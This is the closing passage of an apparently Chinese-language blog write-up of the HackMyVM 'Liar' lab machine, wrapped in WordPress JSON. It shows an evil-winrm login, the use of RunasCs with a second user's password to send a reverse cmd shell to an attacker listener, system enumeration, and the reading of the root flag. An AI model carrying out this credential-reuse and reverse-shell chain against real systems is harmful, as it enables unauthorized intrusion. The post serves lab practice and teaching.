    \u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# evil-winrm -u nica -p 'hardcore'  -i 172.20.10.6\n\nEvil-WinRM shell v3.5\n\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nica\\Documents> cd ..\n*Evil-WinRM* PS C:\\Users\\nica> upload runascs14.exe\n\nInfo: Uploading \/home\/kali\/temp\/Liar\/runascs14.exe to C:\\Users\\nica\\runascs14.exe\n\nData: 65536 bytes of 65536 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nica> .\\runascs14.exe akanksha sweetgirl cmd.exe -r 172.20.10.8:1234\n[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...\n[+] Running in session 0 with process function CreateProcessWithLogonW()\n[+] Using Station\\Desktop: Service-0x0-2abf34$\\Default\n[+] Async process 'cmd.exe' with pid 2936 created and left in background.<\/code><\/pre>\n
    \u6210\u529f\u4e86\uff0c\u62ff\u5230shell\uff01\uff01\uff01<\/p>\n
    \u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# nc -lvnp 1234          \nlistening on [any] 1234 ...\nconnect to [172.20.10.8] from (UNKNOWN) [172.20.10.6] 49687\nMicrosoft Windows [Versi\ufffdn 10.0.17763.107]\n(c) 2018 Microsoft Corporation. Todos los derechos reservados.\n\nC:\\Windows\\system32>whoami \/all\nwhoami \/all\n\nINFORMACI\ufffdN DE USUARIO\n----------------------\n\nNombre de usuario        SID                                           \n======================== ==============================================\nwin-iurf14rbvgv\\akanksha S-1-5-21-2519875556-2276787807-2868128514-1001\n\nINFORMACI\ufffdN DE GRUPO\n--------------------\n\nNombre de grupo                              Tipo           SID                                            Atributos                                                               \n============================================ ============== ============================================== ========================================================================\nTodos                                        Grupo conocido S-1-1-0                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nWIN-IURF14RBVGV\\Idministritirs               Alias          S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nBUILTIN\\Usuarios                             Alias          S-1-5-32-545                                   Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\INTERACTIVE                     Grupo conocido S-1-5-4                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nINICIO DE SESI\ufffdN EN LA CONSOLA               Grupo conocido S-1-2-1                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Usuarios autentificados         Grupo conocido S-1-5-11                                       Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Esta compa\ufffd\ufffda                   Grupo conocido S-1-5-15                                       Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Cuenta local                    Grupo conocido S-1-5-113                                      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Autenticaci\ufffdn NTLM              Grupo conocido S-1-5-64-10                                    Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nEtiqueta obligatoria\\Nivel obligatorio medio Etiqueta       S-1-16-8192                                                                                                            \n\nINFORMACI\ufffdN DE PRIVILEGIOS\n--------------------------\n\nNombre de privilegio          Descripci\ufffdn                                  Estado       \n============================= ============================================ =============\nSeChangeNotifyPrivilege       Omitir comprobaci\ufffdn de recorrido             Habilitada   \nSeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado\n\nC:\\Windows\\system32>whoami\nwhoami\nwin-iurf14rbvgv\\akanksha\n\nC:\\Windows\\system32>cd \\User\ncd \\User\nEl sistema no puede encontrar la ruta especificada.\n\nC:\\Windows\\system32>cd ..\/..\/\ncd ..\/..\/\n\nC:\\>dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\\n\n26\/09\/2023  15:12    <DIR>          inetpub\n15\/09\/2018  09:12    <DIR>          PerfLogs\n15\/09\/2018  09:21    <DIR>          Program Files\n15\/09\/2018  09:21    <DIR>          Program Files (x86)\n26\/09\/2023  18:44    <DIR>          Users\n14\/04\/2024  18:36    <DIR>          Windows\n               0 archivos              0 bytes\n               6 dirs  45.687.545.856 bytes libres\n\nC:\\>cd Users\ncd Users\n\nC:\\Users>dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\Users\n\n26\/09\/2023  18:44    <DIR>          .\n26\/09\/2023  18:44    <DIR>          ..\n26\/09\/2023  18:36    <DIR>          Administrador\n26\/09\/2023  18:41    <DIR>          akanksha\n14\/04\/2024  14:19    <DIR>          nica\n26\/09\/2023  15:11    <DIR>          Public\n               0 archivos              0 bytes\n               6 dirs  45.687.545.856 bytes libres\n\nC:\\Users>cd akanksha\ncd akanksha\n\nC:\\Users\\akanksha>dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\Users\\akanksha\n\n26\/09\/2023  18:41    <DIR>          .\n26\/09\/2023  18:41    <DIR>          ..\n15\/09\/2018  09:12    <DIR>          Desktop\n26\/09\/2023  18:41    <DIR>          Documents\n15\/09\/2018  09:12    <DIR>          Downloads\n15\/09\/2018  09:12    <DIR>          Favorites\n15\/09\/2018  09:12    <DIR>          Links\n15\/09\/2018  09:12    <DIR>          Music\n15\/09\/2018  09:12    <DIR>          Pictures\n15\/09\/2018  09:12    <DIR>          Saved Games\n15\/09\/2018  09:12    <DIR>          Videos\n               0 archivos              0 bytes\n              11 dirs  45.687.545.856 bytes libres\n\nC:\\Users\\akanksha>cd ..\/Administrador\ncd ..\/Administrador\n\nC:\\Users\\Administrador>dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\Users\\Administrador\n\n26\/09\/2023  18:36    <DIR>          .\n26\/09\/2023  18:36    <DIR>          ..\n26\/09\/2023  15:11    <DIR>          3D Objects\n26\/09\/2023  15:11    <DIR>          Contacts\n26\/09\/2023  15:11    <DIR>          Desktop\n26\/09\/2023  15:11    <DIR>          Documents\n26\/09\/2023  15:11    <DIR>          Downloads\n26\/09\/2023  15:11    <DIR>          Favorites\n26\/09\/2023  15:11    <DIR>          Links\n26\/09\/2023  15:11    <DIR>          Music\n26\/09\/2023  15:24            16.418 new.cfg\n26\/09\/2023  15:11    <DIR>          Pictures\n26\/09\/2023  18:36                13 root.txt\n26\/09\/2023  15:11    <DIR>          Saved Games\n26\/09\/2023  15:11    <DIR>          Searches\n26\/09\/2023  15:11    <DIR>          Videos\n               2 archivos         16.431 bytes\n              14 dirs  45.687.545.856 bytes libres\n\nC:\\Users\\Administrador>type root.txt\ntype root.txt\nHMV1STWINDOWZ<\/code><\/pre>\n
    \u81f3\u6b64\u603b\u7b97\u7ed3\u675f\u4e86\u3002\u3002\u3002\u3002<\/p>\n
    \u53c2\u8003<\/h2>\n
    https:\/\/blog.syselement.com\/ine\/courses\/ejpt\/hostnetwork-penetration-testing\/5-post-exploit\/win-privesc<\/a><\/p>\n
    https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/Liar.txt<\/a><\/p>\n
    https:\/\/book.hacktricks.xyz\/network-services-pentesting\/5985-5986-pentesting-winrm<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
    Liar \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.6 — -A Open 172.2 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-558","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/558","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=558"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/558\/revisions"}],"predecessor-version":[{"id":559,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/558\/revisions\/559"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=558"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=558"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=558"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}